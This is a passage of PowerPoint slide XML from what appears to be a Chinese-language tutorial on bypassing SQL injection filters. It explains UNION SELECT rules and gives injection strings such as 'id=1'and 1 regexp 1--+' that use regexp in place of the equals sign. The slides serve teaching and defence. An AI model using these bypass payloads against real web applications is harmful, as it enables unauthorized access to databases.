            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>bypass</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F1723A-510B-4CB3-A962-16151C726573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767475" y="1258515"/>
            <a:ext cx="3094312" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>代替等号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的多种方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06CF1265-5E5C-4E83-87EE-A1A2C4784DA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766172" y="2064374"/>
            <a:ext cx="4470350" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>④ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>regexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>代替 （正则）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EF7021A-8B40-4FF4-9D20-0BC50F360D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724979" y="2905639"/>
            <a:ext cx="744734" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>例：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4220731D-93AD-41A1-9475-C0CB1E574387}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097346" y="3561161"/>
            <a:ext cx="11227293" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>select pass from user where id =1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>select pass from user where id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>regexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t> 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>id=1'and 1=1--+    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>id=1'and 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>regexp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t> 1--+</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1101494953"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534647" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>Sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>bypass</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB34037B-F919-4D96-9F27-F0E99A54B7C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1851333" y="2050662"/>
            <a:ext cx="9041568" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>更多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>https://mubu.com/doc/b_WrldTgR0</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2712649033"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-15397" y="38803"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534648" y="463493"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部数字型的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
